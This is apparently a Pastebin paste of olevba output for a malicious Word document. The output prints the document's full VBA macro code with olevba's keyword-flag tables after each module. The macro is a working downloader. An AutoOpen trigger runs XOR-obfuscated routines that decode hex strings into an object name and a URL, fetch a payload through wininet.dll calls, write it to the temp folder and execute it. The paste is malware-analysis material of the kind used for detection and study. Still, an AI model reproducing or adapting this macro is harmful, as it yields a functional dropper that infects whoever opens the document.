Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- filename-1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: filename-1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: filename-1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub RAMIRO(FELIX As Long)
- CONRAD
- End Sub
- Sub autoopen()
- RAMIRO (124)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
- Dim DREW As Long
- Set OLIVER = IGNACIO(LAURENCE)
- Dim JODY
- Dim HUGO As String
- HUGO = LIONEL(2048, IRVING, RODERICK)
- For DREW = 144 To 145
- DREW = DREW * 3
- Next DREW
- JODY = OLIVER & HUGO
- If WILFRED(HOMER, JODY) Then
- End If
- If RANDOLPH(589, JODY) Then
- End If
- If WILFRED(HOMER, JODY) Then
- End If
- ORVILLE = RICARDO(OLIVER, HUGO, 9)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- Sub CALEB(CALEIGH As Double)
- CAMERON ("BRUCE")
- End Sub
- Public Function SHELDON(ERICK As String, FRANKIE As String) As String
- Dim STEWART As Integer
- Dim DOYLE As Integer
- Dim DARREL As Integer
- For DARREL = 77 To 78
- If DARREL = 70 Then End
- Next DARREL
- Dim ROGELIO As Long
- Dim TERENCE As String
- For ROGELIO = 1 _
- To _
- ( _
- SALVATORE _
- (FRANKIE) _
- / 2)
- STEWART = PRESTON(FRANKIE, ROGELIO)
- DOYLE = GILBERTO(ERICK, ROGELIO)
- TERENCE = TERENCE + RUDOLPH(STEWART, DOYLE)
- Next ROGELIO
- SHELDON = TERENCE
- End Function
- Public Function CAMERON(SANTIAGO As String)
- Dim ALONZO As Long
- ALONZO = 1
- ELIAS ALONZO * 2
- ALONZO = ALONZO + 4
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ELIAS(ERNESTO As Double)
- Dim LIONEL As Object
- Dim TAYLOR As Long
- For TAYLOR = 14 To 15
- TAYLOR = TAYLOR + 15
- Next TAYLOR
- Dim ELLIS As Object
- For TAYLOR = 10 To 20
- TAYLOR = TAYLOR + 60
- Next TAYLOR
- Set ELLIS _
- = LAURENCE()
- ERNESTO = ERNESTO + 7
- For TAYLOR = 232 To 233
- TAYLOR = TAYLOR + 28
- Next TAYLOR
- Dim LEWIS As Boolean
- LEWIS = ORVILLE(LIONEL, ELLIS)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Const HORACE = "163A372920620C3F23293A3724263B2A22"
- Public Const RODERICK = "19352024223875267D202B31"
- Public Const CARROLL = "2D2626357663622432233A38243A353723393D61302A3E7B70677D707962283736"
- Public Const ABRAHAM = "1631202C3C382421346B153D2937013C3F3828221C2739312626"
- Public Const IRVING = "TERRELLMOSES"
- Private Const ROBIN = 4000
- Private Const CESAR As String = "NELSON"
- Private Const JOHCOLIN = 1
- Private Const MALCOLM = &H4000000
- Public Function RUDOLPH(ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
- RUDOLPH = Chr(STEWART Xor DOYLE)
- End Function
- Public Function PRESTON(ByRef FRANKIE As String, ByRef ROGELIO As Long) As Integer
- PRESTON = Val("&H" & (WOODROW(32, FRANKIE, PETE(ROGELIO), 2)))
- End Function
- Public Function PETE(ByRef ROGELIO As Long) As Long
- PETE = (2 * ROGELIO) - 1
- End Function
- Public Function RANDOLPH(GEOFFREY As Long, ByVal JONATHON As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim GUILLERMO As LongPtr, NOEL As LongPtr
- #Else
- Dim GUILLERMO As Long, NOEL As Long
- #End If
- Dim DREWO As Long
- Dim DOMINIC As String * ROBIN, SPENCER As String
- Dim DELBERT As Integer, COLIN As Double
- GUILLERMO = MARCOS
- If GUILLERMO = 0 Then
- Exit Function
- End If
- Dim LUCAS As Boolean
- If WILBERT(NOEL, GUILLERMO) Then
- End If
- If NOEL = 0 Then
- COLIN = 0
- Else
- SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
- SPENCER = DOMINIC
- Dim RODOLFO As Integer
- For RODOLFO = 321 To 322
- If RODOLFO > 1232 Then End
- Next RODOLFO
- Do While DREWO <> 0
- SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
- SPENCER = SPENCER + Mid(DOMINIC, 1, DREWO)
- Loop
- COLIN = SALVATORE(SPENCER): _
- DELBERT = LOWELL("JERRY")
- Open JONATHON _
- For Binary Access Write _
- Lock Write _
- As #DELBERT
- Put #DELBERT, _
- , SPENCER
- Dim EDMUND As Double
- For EDMUND = 62 To 63
- If EDMUND = 637 Then End
- Next EDMUND
- Close #DELBERT
- End If
- WILSON NOEL
- WILSON GUILLERMO
- SPENCER = ""
- If COLIN Then
- RANDOLPH = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const SLIONEL = "JOHN"
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- WILSON Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- GUSTAVO Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As LongPtr
- Public _
- Declare _
- PtrSafe _
- Function _
- SYLVESTER Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- ROOSEVELT Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
- #Else
- Public Declare Function WILSON Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
- Public Declare Function GUSTAVO Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As Long
- Public Declare Function SYLVESTER Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal PAUL As Long, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare Function ROOSEVELT Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
- #End If
- Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
- WOODROW = Mid$(KRISTOPHER, STEWART, DOYLE)
- SAMMY = SAMMY + 50
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function MARCOS() As LongPtr
- #Else
- Public Function MARCOS() As Long
- #End If
- MARCOS = GUSTAVO(CESAR, JOHCOLIN, vbNullString, vbNullString, 0)
- End Function
- Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
- FREDDIE = FREDDIE * 2
- LIONEL = SHELDON(TERRENCE, ENRIQUE)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
- If JERMAINE.FileExists(FORREST) Then
- WILFRED = True
- Else
- WILFRED = False
- End If
- End Function
- Public Function GILBERTO(ByRef ERICK As String, ByRef ROGELIO As Long) As Integer
- GILBERTO = Asc(WOODROW(44, ERICK, _
- ((ROGELIO Mod SALVATORE(ERICK)) + 1), 1))
- End Function
- Public Function LAURENCE() As Object
- Dim ISMAEL As String
- ISMAEL = SHELDON(IRVING, ABRAHAM)
- Set LAURENCE = CreateObject(ISMAEL)
- End Function
- #If VBA7 And Win64 Then
- Public Function WILBERT(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function WILBERT(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim PHIL As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- GUADALUPE = LIONEL(893, IRVING, CARROLL)
- For PHIL = 14 To 15
- PHIL = PHIL + 5.5
- Next PHIL
- GRADY = ROOSEVELT(NOAH, GUADALUPE, vbNullString, 0, MALCOLM, 0)
- WILBERT = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub CONRAD()
- Dim BERT As Long
- Dim ELBERT As Long
- For ELBERT = 5 To 11
- ELBERT = ELBERT * 3
- Next ELBERT
- CALEB (8.2)
- End Sub
- Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
- Set TOMAS = CreateObject _
- (SHELDON _
- (IRVING, HORACE))
- Dim BRETT As Integer
- BRETT = TOMAS.Open(OLIVER & HUGO)
- End Function
- Public Function SALVATORE(KRISTOPHER As String) As Long
- SALVATORE = Len(KRISTOPHER)
- End Function
- Public Function LOWELL(KRISTOPHER As String) As Integer
- LOWELL = FreeFile
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- +------------+--------------+--------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement